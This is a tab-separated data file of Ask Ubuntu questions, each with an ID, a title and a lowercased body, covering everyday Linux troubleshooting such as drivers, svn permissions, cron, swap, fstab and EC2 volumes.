47472	network drivers for dh67bl motherboard with i7 intel processor	i have an issue while installing motherboard software for dh67bl . in ubuntu it 's not connecting to the network and unable to find the suitable drivers for the ubuntu server version . any help or guidance in this regard will be helpful . are there any rpm or deb files available for this version of the motherboard that i can download ?
47474	how to enable compiz for gnome3 ?	after installing gnome 3 the compiz plugins are not working on the gnome-shell . is there a way to enable the compiz on gnome3 shell ? ?
47486	svn server only allows commits when run as root	so as of two days ago i had myself a shiny new svn server . i set it up for webdav with no problems . it was n't until i tried to host multiple projects that i ran into trouble . at first , i had all of the project folders in one repository . but then i saw the error in my ways and switched to multiple repositories . rather than editing the /etc/apache2/sites-available/default file with every new project , i selected to use the svnserve daemon . so , the problem is , i can only make commits from eclipse when the daemon is run as root . if not , i get a `` permission denied '' error . any ideas ? here are the directory stats : drwxr-xr-x 6 root root 4096 2011-06-07 09:38 . drwxr-xr-x 4 root root 4096 2011-06-05 00:48 .. lrwxrwxrwx 1 svn svn 6 2011-06-06 22:35 all - > repos/ drw-rw-r -- 6 svn svn 4096 2011-06-06 13:53 empowerview drw-rw-r -- 6 svn svn 4096 2011-06-06 13:54 googlevoicemail -rw-rw-r -- 2 svn svn 307 2011-06-07 08:47 passwd drw-rw-r -- 6 svn svn 4096 2011-06-06 13:54 perlinnoise drw-rw-r -- 7 svn svn 4096 2011-06-05 02:15 repos -rw-rw-r -- 3 svn svn 2278 2011-06-07 08:46 svnserve.conf edit i tried the suggested re-checkout with the daemon not running as root , and still no cigar . same permission error . edit 2 i also tried running the daemon as the user svn , but no such luck . at one point i screwed up my primary group and no longer had sudo privileges ! i had to hack into my own server through a buddy 's account .
47488	how to change the purple background color in grub ?	how to do this manually , not installing any tools ?
47490	how can i change the icon of a specific device ?	examples : special network share or flash drive , so i can easily identify them . ubuntu 11.04 gnome classic . update : by `` special network share '' i mean network shares which are `` permanently '' mounted using the fstab e.g . in my case samba shares on my home server . i have one for music and one for other stuff . it would be totally fine for me if the icon is on the share or drive and some ( hidden ) auto-loaded configuration file knows where it is .
47492	how can i specify the graph scale in the system load indicator ?	the vertical axis of the graphs produced by the system load indicator appear to scale automatically to the range of the currently displayed data . this is confusing because it visually exaggerates values during times of low cpu/network usage . how can i set a fixed maximum value so that i know how to interpret the graphs ?
47493	how do i format a dvd-rw ?	i have a dvd-rw- / ubuntu ( nautilus and kb3 ) recognise this dvd as dvd with restricted overwrite . so i can not reuse that dvd . i had to pass in windows - make him completely empty there , and return in ubuntu . then everything work normal . ( recognise the dvd as sequential ) . is there a explanation and a better solution ? neither kb3 neither the terminal command : bd/dvdâąrw/-ram format utility by , version 7.1. : - ( mounted media does n't appear to be dvdâąrw , dvd-ram or blu-ray . * in this case the dvd was make `` empty '' with kb3 . when i redo the same in windows , it will work in ubuntu .
47494	need instructions on how to create wpa_supplicant.conf and add fast_reauth=0 to it	like many other natty users on a university/academic network , i 'm experiencing annoying frequent disconnects/hangs/delays . see , for instance here . i would like to learn how to add fast_reauth=0 to the wpa_supplicant.conf file . this file , it seems , does not exist by default , and needs to be manually created first : readme you will need to make a configuration file , e.g . /etc/wpa_supplicant.conf , with network configuration for the networks you are going to use . further , i installed wpa_gui which probably needs to be launched with parameters , else it 's pretty blank ... what i 'm hoping for is this : that creating a wpa_supplicant.conf file with fast_reauth=0 in it , saving it to the relevant path , will work and make my uni wireless ( more or even completely ) stable . i read mixed reviews about wicd ( as an alternative to the network manager ) . also note that on my basic wlan at home ( with bog-standard wpa encryption ) the connection is stable . thanks !
47496	how can i add a custom compose key sequence ?	how can i add a custom compose key sequence ? for example , i would like compose , | , > to type the â¸ symbol . i have tried adding the following to ~/.xcompose : # import default rules from the system compose file include `` % l '' # custom definitions < multi_key > < bar > < greater > : `` â¸ '' u25b8 # black right-pointing small triangle but the new sequence is not usable anywhere except for xterm . installing ibus-table-compose and then enabling the compose input method in ibus did not solve the problem ; ibus imitated many compose key sequences , but not the one i had created .
47499	what files should i clean up before creating a disk snapshot ?	after setting up a new ubuntu virtual machine guest , i like to take a disk snapshot so that i can restore to a working state in case i break something later on . i 'd like to avoid snapshotting unnecessary files , so i always run apt-get clean beforehand . what else might i be interested in cleaning up before taking the snapshot ?
47505	how should i specify command-line arguments for atd ?	the manual for atd describes the command-line option : -b specify the minimum interval in seconds between the start of two batch jobs ( 60 default ) . how can i permanently set this option so that , for example , jobs queued by batch are allowed to run within 10 seconds of each other ?
47506	how do i install additional drivers ?	i 've just installed ubuntu and i need either video , wireless , or some sort of other manufacturer ( non-opensource ) driver . how can i run the tool that will fetch all of these for me ? i 'd like graphical instructions . related : can i install extra drivers via the command prompt ?
47507	how do i install gnome 3 on 10.10 ?	i tried to find out how to install gnome 3 on ubuntu 10.10 , but all i found is gnomeshell . is it possible anyway to install gnome 3 ?
47510	how can i view the load average over a shorter time period ?	uptime reports load averages over the last 1 , 5 , and 15 minutes . how can i view the load average over the last 10 seconds ?
47515	any way to search for text within nano ?	nano is the editor i use in command prompts . when i open a large file i would like to search for some text ( think ctrl + f ) . is there a way to do this ?
47520	unable to login after power outage	i have accidentally cut power to the computer and now i ca n't login with my main user . in gdm i enter the password correctly but it always says `` wrong password '' . logging in with another user works . i changed the password for the main user , but it does n't recognize the new password either . how can i fix that ? edit : the file system check yielded no damage message . however , on rebooting the installed os , i noticed the keyboard layout was set to en-us which i do n't use . but i swear before that it was set to the layout i normally use before the file system check . so everythings back to normal , i can log in . thanks for everă˝bodys input .
47521	how do i troubleshoot a local webserver ?	i had a webserver running at luna.local , it got eaten when i upgraded to 10.10 . in trying to restore it , i 'm pretty stumped . i 'm more stumped by this : [ 0 amanda @ luna ~ ] $ apache2 -d dump_vhosts apache2 : bad user name $ { apache_run_user } where is the run user supposed to be set ? in `/etc/apache2/envvars i see : 16 export apache_run_user=www-data 17 export apache_run_group=www-data and ps aux | grep apache shows apache2 running as www-data : root 1927 0.0 0.2 36216 8804 ? ss 07:44 0:01 /usr/sbin/apache2 -k start www-data 14307 0.0 0.1 36216 4388 ? s 14:10 0:00 /usr/sbin/apache2 -k start www-data 14308 0.0 0.1 36544 5148 ? s 14:10 0:00 /usr/sbin/apache2 -k start www-data 14309 0.0 0.1 36216 4388 ? s 14:10 0:00 /usr/sbin/apache2 -k start www-data 14310 0.0 0.1 36216 4388 ? s 14:10 0:00 /usr/sbin/apache2 -k start www-data 14311 0.0 0.1 36216 4388 ? s 14:10 0:00 /usr/sbin/apache2 -k start www-data 14409 0.0 0.1 36216 4388 ? s 14:11 0:00 /usr/sbin/apache2 -k start so ... what gives ? wierder : my virtualhost definition definitely says : 1 < virtualhost *:80 > 2 servername luna.local 3 4 documentroot /home/amanda/public/luna 5 < directory /home/amanda/public/luna > 6 options indexes followsymlinks multiviews 7 allowoverride none 8 order allow , deny 9 allow from all 10 < /directory > but the error log says : [ tue jun 07 14:25:54 2011 ] [ crit ] [ client 127.0.0.1 ] ( 13 ) permission denied : /home/amanda/.htaccess pcfg_openfile : unable to check htaccess file , ensure it is readable [ tue jun 07 14:25:54 2011 ] [ debug ] mod_deflate.c ( 615 ) : [ client 127.0.0.1 ] zlib : compressed 278 to 215 : url / why is it not looking all the way into public/luna ?
47522	how to bypass `` try it / install '' screen when booting from usb live session ? ( without installing in the usb )	this has been asked several times already ( i found it here , here and here ) , but basically everyone simply recommend to perform a full install to the usb stick . but i do need it to stay as a live session , not a `` full install on usb '' , for a number of reasons ( the most important one being that using live session i can easily install ubuntu using the desktop icon ) so , my constraints for skipping the welcome screen ( and automatically choose `` try ubuntu '' option ) are : it must actually be the ubuntu live session ( or as close to the default as possible ) . same software selection ( gparted is present in live sessions , gimp is not , for example ) , user ( name and id ) , behavior ( no login screen , no password for sudo , to name a few ) , no grub , etc . that rules out an ubuntu full install on usb . it must be able to install ubuntu in the computer ( while full install requires the iso file , an additional usb stick , and the hassle of startup disk creator ) if possible , to be as fast as the `` text-based launcher '' ( the one you have when you press a key right after the kernel loads ) it must be completely automatic , unattended from boot to desktop . select a different language than default . it can be a hard-corded selection ( actually , it must , since boot itself shall be fully unattended ) . but preferably be easily changed ( `` easily '' as in editing a config file then rebooting ) is it possible ? the proposed ( great ) solutions that i 've ruled out so far are : installing ubuntu in the usb stick ( for all of the above mentioned reasons ) remove ubiquity package ( it removes the ability to install the system from that usb as well ) ubuntu customization kit ( ubk ) : several limitations and caveats , and its not even in the repos remastersys / lili : its the same as full direct usb install , only customized . an ideal solution would be something like `` create usb sick using startup disk creator , then open it and remove / edit / add file ( s ) xxx , yyy , zzz ''
47523	back button not working in browsers	i recently switched from windows to ubuntu . the back buttons in the browsers ( both firefox and chrome ) are not working . every time i have to right click and select 'back ' option . is there any work around for this ?
47527	how can i install elementary os on ubuntu ?	how can i install the components that make up elementary os on ubuntu ?
47532	autostart dropbox in lubuntu	i 've installed dropbox ( as per the instructions supplied in dropbox 's home page and a personal blog i found browsing about the subject ) , but still no success in forcing autostart ( only for my user ) on dropboxd . i 've tried adding an autostart file in : but no success so far ... i have to start it manually . i do n't want to edit the file in : /etc/xdg/lxsession/lubuntu/autostart the file plainly states : ~/.dropbox-dist/dropboxd as i have understood , would add autostart for dropbox for all users ... any ideas about what went wrong ? edit : both the links mentioned above seem non-functional .
47533	how can i force the usage of a repository ?	i have added the following to my sources.list : deb http : //ppa.launchpad.net/kubuntu-ppa/experimental/ubuntu/ lucid main unfortunately , whenever i do a sudo apt-get update , the repository is ignored . at least that 's what i think ign means in the following output . does anyone know how to force the use of a repository ? here 's the part where it says `` ign '' : ign http : //ppa.launchpad.net/kubuntu-ppa/experimental/ubuntu/ lucid/main translation-en_us
47538	how to make read-only file system writable ?	i am not sure since when the filesystem on my digital audio player has been changed to be read-only . i can not copy files into it or remove files on it . are there some possible reasons for the player 's file system to change the permission of its file system ? i tried chmod : $ sudo chmod a+rw sgtl\ mscn/ chomd : changing permissions of `sgtl mscn/ ' : read-only file system where `` sgtl mscn '' is the mounted point of the digital audio player . i was wondering how to make it writable ? thanks and regards !
47541	what programs can a user use to make the desktop more pleasant/enhance/better	at this moment i know of unity which looks much better than the default gnome desktop that comes in 11.04 . also compiz adds effects so that enhances the view . but what about other tools that make the view of the desktop much more pleasant to see .
47542	how can i turn off the message `` the media contains digital photo '' , in nautilus ?	i have a fat partition on my system for storage purposes , and from a time to now i 'm seeing this message in nautilus : '' the media contains digital photo '' there is any way to turn it off ?
47550	how to run the official bitcoin client ?	i want to run the official bitcoin client , rather than one from somebody 's personal ppa , as was explained in question 41001 . how do i install and run it ?
47554	what are the default hidden folders under ~ ?	i was wondering what the default hidden folders under ~ ? what are their purposes ? for example , what are the purposes of ~/.local/ and ~/.local/share/ ? which of these hidden folders also exist in general linux distributions ? my ubuntu is 10.10 . thanks and regards !
47560	how do i install adobe air ?	i found some links , but they all seem a bit unsure , so i 'm wondering if it is possible , and looking for simple ( if possible ) instructions .
47565	can vm 's use more than one node in ubuntu cloud ?	can a virtual machine , instantiated in the ubuntu cloud ( uec ) , use resources from more than one node ?
47568	different options to share files on ubuntu one ?	when i right-click on a file and go to ubuntuone , i am unable to select any option except `` hide ribbon '' and most of the time there is no ribbon to hide . so is moving files to the ubuntuone folder the only option ?
47571	can banshee fix music metadata information ?	i 'd like banshee to automatically find and fix the correct song title and artist names and album information for my music from the internet . is this possible with this software ? something like , 'find music metadata ' .
47575	why would logwatch ( with cron ) on stop e-mailing me daily reports ?	i have logwatch configured with cron to e-mail me a daily report from my ubuntu server . occasionally , something happens like the power goes out ( which is what just happened actually ) or the system gets turned off . after turning the system back on , i do n't get my daily report , and then sometimes one to a few days later the daily reports start getting sent again . at this time of writing i have n't received a logwatch report from my ubuntu server in five days which is the longest time period this has ever gone on for me . so basically , i 'm wondering what could i check for problems and what commands could i execute to fix these problems get my daily logwatch reports being e-mailed to me again ? thanks in advance for your time in helping solve my problem and answer my questions . updates : i ran ls -lut /etc/cron.daily and realized my cron scripts have n't been run since may 30th . so cron has stopped working . how can i get it working it again ? checking the syslog also reveals cron has n't run since may 30th . running sudo service cron restart got cron working again ( i can verify by looking at my hourly scripts being run hourly ) . additionally , i ran the logwatch script inside /etc/cron.daily/ so i know the script is working . so i 'm hoping that tomorrow around 6:30 am that cron runs my daily logwatch script . and ... success ! i 'm going to summarize what i did and accept it as a best answer .
47579	how to voice chat in kopete for google talk contacts	i am on kubuntu 11.04 . i have set up my google talk account in kopete as per normal setup ( talk.google.com-5223-ssl ) . but the problem is i ca n't seem to find the call option for voice calls . as per i recall when last i used kubuntu ( 10.10 ) , there was an option to talk with google contacts . it was possible via kopete-gcall . but kopete-gcall seems to be missing in natty . it 's a very useful feature to talk to google contacts from kopete . is it me only or others have been facing this issue as well ? need your help to solve this problem .
47582	what can be wrong with my fdisk -l output ?	i have reinstalled ubuntu 5 times already and i ca n't find what is wrong i messed with /etc/fstab and seems i do n't have swap space can some one help me and tell if this is a healthy fdisk -l , and if not what i should do ? disk /dev/sda : 20.4 gb , 20416757760 bytes 255 heads , 63 sectors/track , 2482 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000675f device boot start end blocks id system /dev/sda1 * 1 2483 19936256 7 hpfs/ntfs disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xafe6fd0f device boot start end blocks id system /dev/sdb1 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sdb2 * 13 5839 46793727+ 7 hpfs/ntfs /dev/sdb3 15808 19457 29312000 7 hpfs/ntfs partition 3 does not end on cylinder boundary . /dev/sdb4 5839 15807 80071552+ 5 extended /dev/sdb5 6165 15517 75123712 83 linux /dev/sdb6 15518 15807 2329393+ 82 linux swap / solaris /dev/sdb7 5839 6165 2618368 82 linux swap / solaris partition table entries are not in disk order disk /dev/dm-0 : 2385 mb , 2385298944 bytes 255 heads , 63 sectors/track , 289 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6afd02f5 disk /dev/dm-0 does n't contain a valid partition table disk /dev/dm-1 : 2681 mb , 2681208832 bytes 255 heads , 63 sectors/track , 325 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4438c22c disk /dev/dm-1 does n't contain a valid partition table output of ls /dev/mapper : control cryptswap1 cryptswap2 sometimes , my computer drops to an initramfs shell on boot or becomes very slow . i think it 's because there is something wrong with my swap space . this is my fstab file : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb5 during installation uuid=f78f1d1f-82e3-48bd-b3e5-03fd8b75dfcc / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb6 during installation # uuid=a3c19631-c3ed-44b2-b409-7ed31fd3d7aa none swap sw 0 0 # swap was on /dev/sdb7 during installation # uuid=5e8beccd-8dbb-431b-aa65-c1f073b30b10 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 /dev/mapper/cryptswap2 none swap sw 0 0 this is outpost of mount . /dev/sdb5 on / type ext4 ( rw , errors=remount-ro , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) n one on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/lerry/.private on /home/lerry/private type ecryptfs ( ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=bbdcf1ee6db39142 , ecryptfs_fnek_sig=aab58941a7c801da ) gvfs-fuse-daemon on /home/lerry/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=lerry )
47584	update manager/ubuntu software centre not working	i 'm running ubuntu 11.04 64 bit version . nothing happens when hitting `` install updates '' button in update manager , except for the mouse cursor shortly ( < 1 second ) displaying the wait icon . i can update using apt-get without any problems . also in the ubuntu software centre , nothing can be installed , and the problem is similar , when hitting the install button , the mouse cursor shortly changes , but nothing else happens . and also here i can perform the install using apt-get . update : checked syslog ( for update manager ) and got the following : jun 10 07:51:05 mihubuntu aptdaemon : info : commitpackages ( ) was called : dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u'language-selector ' ) , dbus.string ( u'language-selector- common ' ) , dbus.string ( u'language-selector-gnome ' ) , dbus.string ( u'rhythmbox ' ) , dbus.string ( u'rhythmbox-plugin-cdrecorder ' ) , dbus.string ( u'rhythmbox-plugins ' ) , dbus.string ( u'shotwell ' ) , dbus.string ( u'software-center ' ) , dbus.string ( u'unity ' ) , dbus.string ( u'unity-common ' ) , dbus.string ( u'unity-place-files ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) jun 10 07:51:05 mihubuntu aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/687c7f6b69c84bbd94912504a7b9f988 jun 10 07:51:05 mihubuntu kernel : [ 1138.262724 ] show_signal_msg : 27 callbacks suppressed jun 10 07:51:05 mihubuntu kernel : [ 1138.262731 ] polkitd [ 586 ] : segfault at 20 ip 00007f31f777bb42 sp 00007fff4159c128 error 4 in libglib- 2.0.so.0.2800.6 [ 7f31f76fd000+ed000 ] tried to reinstall update manager , and that did not help . did do the upgrade of the software centre , but that did n't help either . from the syslog : jun 10 08:01:20 mihubuntu aptdaemon : info : commitpackages ( ) was called : dbus.array ( [ dbus.string ( u'filezilla ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) jun 10 08:01:20 mihubuntu aptdaemon.trans : info : queuing transaction /org/debian /apt/transaction/b1d6cb76d47a4e94961774af7471848a jun 10 08:01:20 mihubuntu kernel : [ 1752.008865 ] polkitd [ 6605 ] : segfault at 20 ip 00007f5b7071ab42 sp 00007fffc402e608 error 4 in libglib- 2.0.so.0.2800.6 [ 7f5b7069c000+ed000 ]
47585	urdu font and typing ( phonetic )	i am trying to setup a ubuntu desktop for my grand father : - ) who wants to type urdu , he does this on windows xp / vista / 7 at the moment but as he is n't too internet literate he gets infected by all sorts of malware which is a hassle for him and for the person who re-installs or cleans his system ( me ) . : - ) i have successfully installed ubuntu 10.10 for him with openoffice word processor , i then went into ubuntu software centre and installed some urdu packages ( screenshot attached ) . basically he wants his desktop in english but he wants to be able to type in english and urdu in openoffice ( like windows where you can switch between languages ) but he wants his keyboard layout and everyother thing in english ( usa kb layout ) . to summarize : he has a english us layout keyboard he wants to type in urdu and english he will use openoffice wordprocessor ( i guess there is n't anything better than this on linux ) any other fonts you would recommend or any other useful suggestions will be really grateful for askubuntu community 's prompt input on this ! thanks for reading ! kind regards rihatum
47587	renaming multiple files by adding a string to the beginning	i have a question concerning the renamining of multiple files in a folder . for about 200 files i would like to add the string `` 1_ '' to the beginning of all filenames . the filenames are for example `` dataset_x_y_z '' and the result should be `` 1_dataset_x_y_z '' . maybe somebody knows how to do this the easy way . unfortunately i do n't know a thing about shellscripting but maybe there is a oneliner for the terminal . thanks !
47594	ca n't login after upgrade	when ubuntu loads up , it asks to log in . when i press my username or `` other '' , login window flicks a bit and is right back where it was , nothing happens . ca n't log in . any ideas what 's wrong ? xsession-error : ( gnome-terminal:3401 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : gnome-terminal : undefined symbol : menu_proxy_modu le_load
47598	kde development in kubuntu	i 'd like to start doing bug fixes etc . for the kde project and was wondering what development environment i should use .
47608	accidently deleted /usr/lib/*.so . *	while i was installing mrtg , by mistake i have deleted /usr/lib/*.so . * and /usr/lib/*.so i am now unable to boot-up my system now , it gets stuck at the splash screen and when i press pagedown button i can see there are several things which are failing to load . however , dhcp and webmin are running and from webmin i can see the system logs which tells me that cups is not loading because libpipeline.so.1is missing and several others . my computer is running 11.04
47609	how to have my php send mail ?	i installed ubuntu 11.04 , lamp using tasksel . i find that php mail ( ) does not work . i suppose i need to enable it or something ? how do i do that ?
47612	audio backend for 11.04 ?	often the audio quality is very bad so i 've to restart the audio backend . when i 'm using alsa i ca n't since the command to restart it seems not to find the file ( strange as alsa works.. ) when i 'm use pulseaudio , i can restart with pulseaudio -k in a terminal . oss never worked to me . when ubuntu used esd , the audio always worked ( ubuntu 10.04 or maybe earlier ) . someone encountered similiar problem ? which backend do you use ? i 've an integrated nvidia soundboard ( mcp77/78 hdmi ) .
47617	how to attach new ebs volume to ubuntu machine on aws ?	disclaimer : i 'm probably missing something obvious , sorry in advance . i need more ebs disk space for my ubuntu 11.04 server running on amazon ec2 , and decided to create new volume in addition to the root volume . ( it 's an ebs-backed instance , created from official ubuntu amis . ) so , i opened aws management console , created a volume , and attached it to the instance : i chose /dev/sdb as suggested by the dialog . aws console shows the volume as correctly attached to the instance . problem is , the device /dev/sdb is not available on the instance , not immediately nor after reboot : $ sudo mkfs.ext4 /dev/sdb mke2fs 1.41.14 ( 22-dec-2010 ) could not stat /dev/sdb -- - no such file or directory did i miss some necessary step , or is the volume available under some other device name ? ( also tried /dev/sdc with same result ; /dev/xvda3 was n't accepted as `` valid ebs device name '' . )
47623	list the hardware info and status in my computer	i was wondering how to list all the hardware info in my computer ? both terminal and gui solutions please . is there a single utility to monitor most hardware 's working status ? just like some software in windows ? thanks and regards !
47628	good download manager for ubuntu	can you recommand any download manager for ubuntu ? features i 'm looking for : works in unity env . can download from rapidshare . supports sceduled downloads . there is transmission bittorrent client installed by default , but it supports only torrent downloads and have no scheduling support .
47634	virtualization on windows : boot from ext4 partition on usb	with which virtualization solution can i boot an ubuntu install in an usb ?
47640	is there a cyber-cafe program for server-client places ( internet cafe )	is there a program for ubuntu that can be used to control the time for the clients in an internet cafe or cyber cafe . similar to cyber control and others . it blocks the clients pc until a client comes and starts a timer after which is blocks again .
47642	how to start a gui software on a remote linux pc via ssh	sometimes i need to start xmbc media player or other gui software a one of my pc ( small xubuntu pc used as a media center ) . usually i do this starting a x11vnc server on the remote pc via ssh and than connecting with an xvnc client to the xfce desktop . is there a way to start a gui software on a remote linux pc via ssh ? thanks !
47643	how do i make a theme from scratch for unity ?	i 'd like to make a theme from scratch for unity . what knowledge and information/skills are needed ? are there any tools or templates out there for something like this already ? i do n't have any python experience so tools biased towards beginners are preferable .
47647	how to disable all gui elements and boot to command prompt	cross post from serverfault i have a laptop i 'm running as a file server , which is running ubuntu 10.04 desktop . now that summer heat is here , and because i love the environment , i 'm look for all sorts of ways to reduce the laptop 's power/memory/heat footprint . one part i never touch any more is the gui as the lids always closed . i thought perhaps simply removing gdm from all run-levels my achieve this , so i did so using sysv-rc-conf . however this did n't make any difference and upon reboot the lovely ubuntu boot screen and graphical login prompt appeared . please help ! additionally , perhaps this is a silly question , i want to make sure that the monitor is off at all times the lid is closed , which it is already set to do when the gui is running , can/do i need to configure this separately for non-gui environments ? ( seems to be doing this fine ) thanks : d edit : ok maybe i 'm using sysv-rc-conf wrong and it needed 2 reboots to apply the settings or something ? as rebooting it a second time since removing gdm from all run levels i got a command prompt . however i did n't watch it reboot and was a little confused by this , so i rebooted what i believe to be a 3rd time , and now it 's booted to a black screen with a solitary white underline in the top-left , no other text . no amount of keyboard mashing in order to change run levels is having any effect , however i am able to access it via ssh and the smb shares , so i suppose it 's doing almost what i want . the lack of a cli on the screen itself is still concerning however .
47649	does upstart emit hooks for sysv jobs ?	i want to make an upstart job start immediately before a system v job ( /etc/rc0.d/s40umountfs ) . i 've tried specifying : start on starting umountfs but upstart does n't recognize the name of the script : $ initctl check-config collapsefs start on : unknown job umountfs is there any way to do this ?
47660	commandline tool for viewing xls files	is there a commandline tool for viewing/opening excel ( .xls ) files ? so the answer works great unless the worksheets do n't have a custom name . when i try to open the file , i get : traceback ( most recent call last ) : file `` /usr/bin/py_xls2csv '' , line 17 , in < module > for sheet_name , values in parse_xls ( arg , 'cp1251 ' ) : # parse_xls ( arg ) -- default encoding file `` /usr/lib/python2.5/site-packages/pyexcelerator/importxls.py '' , line 334 , in parse_xls raise exception , 'no workbook stream in file . ' exception : no workbook stream in file . however , if i open up the file and rename the sheet to 'test ' or something it works fine . what do i need to tweak so that it can handle the default names ? ( sheet1 , etc ) the file i 'm trying to open at present has only 1 sheet , named sheet1 .
47661	how do i upgrade a server image inside ec2 ?	i setup an instance of ubuntu on amazon ec2 using an ami that i had found . when i login to the server through ssh it says a newer build of the ubuntu lucid server image is available . it is names 'release ' and has a build serial '20110201.1 ' . what i found online was that i should run do-release-upgrade -d to upgrade the distribution . when i ran it though it seems to try to upgrade to maverick meerkat . i want to upgrade to the lts release . is there a way that i can upgrade my server without rebuilding it ?
47666	when installing .deb files , does its ppa install too ?	when installing .deb files to install software , does its ppa also get installed into software sources ? i ask because if i find some software online which has a .deb download , i tend to look for its ppa , add it to my sources , then go through synaptic to install the software . i do this because i want future updates for it . but this is a longer process than installing .deb files with gdebi .
47668	how do i migrate to a newer python version and still use packages in the old version ?	on ubuntu 10.04 i recently installed python 2.7.1 ( activepython from activestate ) . i use meld to diff code and had no issues with python 2.6.5 , but after moving to 2.7.1 i get the following error when i execute meld : meld requires pygtk 2.8.0 or higher looking in synaptic package manager , i have python-gtk2 installed which i believe maps to pygtk , but since meld can not find it , does that mean it is installed for 2.6.5 ? if i run the following : pip install pygtk i get : importerror : no module named dsextras dsextras seems to be part of pygobject but if i try to do : pip install pygobject i get an error that indicates that this type of installation is only supported on windows : not supported , ok [ y/n ] ? error : distutils build only supported on windows what 's the recommended way of migrating to a newer python version ? is it possible to import the packages from 2.6.5 into 2.7.1 or do i risk running into compatibility issues ?
47674	weird characters on gzip package	i 'm trying to gzip my js files which in js folder . gzip -cr js i 'm using this command on terminal but this is result : 8�h�q�yug�` ] { _��a '' g9xj�c� ! ��y �c�s�ؙ�sy� } ���-mu�����w�� @ f�x�� q ) ���k������ ; �nߪ�7�x�z� [ �y1e �� �b�źv���ز�7�w���k��� ! �z���奩�vi�hc��r�r��nj�q�k�sv [ xnl= ( v٧p'ҽ�o�e�p ) ���vkﱮx|-�t�ii��b ! �vf�~f��� �|x���*b 3��y� # �s��8k ( ��l�o�4�7y�nenָ��а�� ( �r��+e^�g�5 $ ��. $ td� { ʔ�ycq�z+ cx� ӧc�5�-0um���qݫ�b���b�.5 ��u0�� ? n��1�toc����-����� # � [ j�je9���j�nv��j���r�us����ϸ����~����ğ�c_'��q�=��j���^ > ���d���f������krv綶�yꮖ�8��o�׶=qz @ ���nqi { ḧ������7ym= y�n�e�� . 'k�|�zj��1�ᬇl� ��s h��ش�6y* ( k� { |�ఱ� .�kydi���࿒���k�g�lz��rsr�ϫ� ) e�nj����id�64����_�r8u�2�'���^�� ; � � < y����ͨm�+���k� ] r��ǝ'��p [ _i ��t��e���-z�ٙaq3�� @ 넁�-�m'�+�b����g���~��� [ u�pps�q < �㖈x̓a�m�ܪ�������쒁����**z�*k ] l�nf8a�l��d���5�ݗ����o����_y��p : �� ����o�� ����q ] ��v�� < � ! kd݅��e� ��*| % ��� jjc�'p�w�j��q , ��d��a�e�* # ɖ��1�4|��+3d� } t��hh ( ��^ϭ�j�� $ �� # ��p��\ > j5����a��j��jo�¿ what do you think , what 's the problem ? maybe utf8 encoding ?
47675	why should i trust the `` system program problem detected '' dialog ?	this always shows up a few minutes after i log in : i have no idea what it is . if i click report problem , it asks for my password : this is exactly what i would do if i wanted to steal someone 's password . why should i trust it , and what is it going to do next if i comply ?
47679	how do you install canon mf4530d laser printer ?	how do you install canon mf4530d laser printer with 11.04 ? open printing .org says it will work perfectly , but i have yet to print anything . the printer is recognized in cups , but when trying to print a test page i get extensive error log messages . how can this be overcome ? error log diagnostic output
47684	can i make audio with only one stereo channel play through both speakers ?	some videos have stereo audio , but audio only plays out of one channel ( only plays out of left speaker or only out of right speaker ) . unfortunately , remixing these to mono with something like ffmpeg is not an option . is there any way to make ubuntu play the left stereo channel through both speakers ( and vice versa , when necessary ) ?
